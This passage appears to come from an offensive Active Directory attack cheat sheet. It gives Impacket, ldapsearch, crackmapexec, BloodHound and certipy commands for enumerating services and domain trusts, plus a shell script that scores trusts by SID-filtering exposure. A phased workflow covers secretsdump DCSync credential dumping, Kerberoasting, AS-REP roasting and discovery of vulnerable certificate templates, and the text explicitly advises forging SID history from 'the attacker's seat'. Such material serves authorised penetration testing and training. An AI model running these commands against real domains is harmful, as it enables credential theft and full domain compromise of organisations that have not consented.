# Exchange discovery (exchangeMDB, SMTP, IMAP and POP SPNs; Exchange also registers HTTP SPNs for its web services)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -iE "exchange|smtp|imap|pop"
# Web application services
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -iE "http|www"
# Additional service discovery (RDP registers TERMSRV/, not "rdp"; WinRM registers WSMAN/)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -iE "ftp|ssh|vnc|termsrv|wsman"
Requirements: Domain user credentials
Use Case: Identifying integrated applications and services for expanded attack surface
Trust Relationship Analysis
Purpose: Map trust relationships for cross-domain attacks.
Trust Enumeration
# Basic trust discovery (Impacket ships no getTrusts.py; trusts are trustedDomain objects under CN=System)
ldapsearch -x -H ldap://<DC-IP> -D '<username>@<domain.com>' -w '<password>' -b "CN=System,DC=domain,DC=com" "(objectClass=trustedDomain)" trustPartner flatName trustDirection trustType trustAttributes
# Cross-domain enumeration (your credentials keep their own domain prefix; locate each trusted domain's DC through its SRV record and point the tools there. GetADUsers.py derives its search base from the credential domain, so it cannot walk a trusted domain; ldapdomaindump reads the base from the target DC and can)
for domain in $(cat trusted_domains.txt); do
echo "Enumerating $domain"
tdc=$(dig +short SRV _ldap._tcp.dc._msdcs.$domain | awk 'NR==1 {sub(/\.$/, "", $4); print $4}')
ldapdomaindump -u '<domain>\<username>' -p '<password>' -o /tmp/enum/$domain $tdc
python3 GetUserSPNs.py <domain>/<username>:<password> -target-domain $domain -request    # -target-domain resolves the trusted domain via DNS and ignores -dc-ip
done
# Trust-specific BloodHound collection
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts
Requirements: Domain user credentials, network access to trusted domains, and a trust direction that lets your principal authenticate there
Use Case: Multi-domain environments with established trust relationships
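trustDirection, trustType and trustAttributes come back as integers, and the attribute bits decide whether SID history from the other side is honoured, which is what turns a trust into an escalation path. The script below is an added example, not from the page: it decodes those three attributes from ldapsearch output and states the SID-filtering consequence. The bit values follow the trustAttributes definitions, the sample entries are constructed, and the SID-filtering interpretation reflects the default netdom behaviour for each kind of trust.

```bash
#!/bin/sh
# Added example (not from the original page): decode the trustedDomain
# attributes returned by the ldapsearch above into direction, type and
# attribute flags, and say what that means for SID filtering. Bit values
# follow the trustAttributes/trustDirection definitions; the LDIF sample
# is constructed.

TRUST_ATTR_BITS='NON_TRANSITIVE 1
UPLEVEL_ONLY 2
QUARANTINED_DOMAIN 4
FOREST_TRANSITIVE 8
CROSS_ORGANIZATION 16
WITHIN_FOREST 32
TREAT_AS_EXTERNAL 64
USES_RC4_ENCRYPTION 128'

# trust_direction N: 1 = partner trusts this domain (our principals can
# authenticate there), 2 = this domain trusts the partner (their principals
# are accepted here), 3 = both.
trust_direction() {
    case "$1" in
        0) echo disabled ;;
        1) echo inbound ;;
        2) echo outbound ;;
        3) echo bidirectional ;;
        *) echo "unknown($1)" ;;
    esac
}

# trust_type N: 1 = downlevel (NT4), 2 = uplevel (AD), 3 = MIT Kerberos realm.
trust_type() {
    case "$1" in
        1) echo downlevel ;;
        2) echo uplevel ;;
        3) echo mit ;;
        *) echo "unknown($1)" ;;
    esac
}

# trust_attrs N: comma-separated names of the known trustAttributes bits set.
trust_attrs() {
    out=""
    while read -r fname fbit; do
        [ $(( $1 & fbit )) -ne 0 ] && out="${out:+$out,}$fname"
    done <<EOF
$TRUST_ATTR_BITS
EOF
    printf '%s\n' "${out:-none}"
}

# sid_filtering ATTRS: what the decoded attribute names imply. Order matters:
# the intra-forest bit wins, then explicit quarantine, then the forest cases.
sid_filtering() {
    case "$1" in
        *WITHIN_FOREST*)      echo none ;;      # intra-forest: SID history honoured, the classic child-to-parent path
        *QUARANTINED_DOMAIN*) echo enforced ;;  # external trust with quarantine (netdom /quarantine:yes, the default)
        *TREAT_AS_EXTERNAL*)  echo relaxed ;;   # forest trust with SID history enabled (netdom /enablesidhistory:yes)
        *FOREST_TRANSITIVE*)  echo enforced ;;  # forest trust default
        *)                    echo disabled ;;  # external trust without quarantine: foreign SID history accepted
    esac
}

# emit_trust: print "<partner> <direction> <type> <attrs> sid-filtering=<x>"
# from the variables trust_report has collected for the current entry.
emit_trust() {
    [ -n "$partner" ] || return 0
    a=$(trust_attrs "${attrs:-0}")
    printf '%s %s %s %s sid-filtering=%s\n' "$partner" "$(trust_direction "${dir:-0}")" "$(trust_type "${ttype:-0}")" "$a" "$(sid_filtering "$a")"
}

# trust_report: read ldapsearch output for (objectClass=trustedDomain) on
# stdin, one entry per blank-line-separated block, and emit a line per trust.
trust_report() {
    partner=""; dir=""; ttype=""; attrs=""
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            trustPartner:*)    partner=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            trustDirection:*)  dir=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            trustType:*)       ttype=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            trustAttributes:*) attrs=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            '') emit_trust; partner=""; dir=""; ttype=""; attrs="" ;;
        esac
    done
    emit_trust
}

# Constructed entries: a child domain in the same forest, a quarantined
# external trust, and an external trust whose quarantine was switched off.
SAMPLE_TRUSTS='dn: CN=dev.corp.example,CN=System,DC=corp,DC=example
trustPartner: dev.corp.example
trustDirection: 3
trustType: 2
trustAttributes: 32

dn: CN=partner.example,CN=System,DC=corp,DC=example
trustPartner: partner.example
trustDirection: 2
trustType: 2
trustAttributes: 4

dn: CN=legacy.example,CN=System,DC=corp,DC=example
trustPartner: legacy.example
trustDirection: 1
trustType: 2
trustAttributes: 1'

# Usage: ldapsearch ... "(objectClass=trustedDomain)" trustPartner trustDirection trustType trustAttributes | trust_report
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_TRUSTS" | trust_report
fi
```

Read the output from the attacker's seat: an inbound or bidirectional trust is one your compromised principal can authenticate across, and sid-filtering=none or disabled on such a trust means a forged SID history (for example an Enterprise Admins RID) will be honoured on the far side.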
Systematic Enumeration Workflow
Phase 1: Baseline Intelligence Gathering
# Complete domain structure mapping (HTML, JSON and .grep output are all produced by default; there are no --html/--json switches)
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> -o /tmp/enum/
# Multi-protocol correlation (cme ldap has no --computers switch; computer objects are in the ldapdomaindump output)
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares --sessions
Phase 2: Credential and Secret Extraction
# Local admin on the DC or DCSync rights required
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc -outputfile /tmp/creds
# Service account targeting (any domain user)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile /tmp/kerberoast
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -format hashcat -outputfile /tmp/asrep
Phase 3: Privilege Escalation Mapping
# Relationship analysis (bloodhound-python has no -o switch: it writes into the working directory, and -op sets a filename prefix)
mkdir -p /tmp/bloodhound && cd /tmp/bloodhound && bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all --zip
# Advanced enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerable -stdout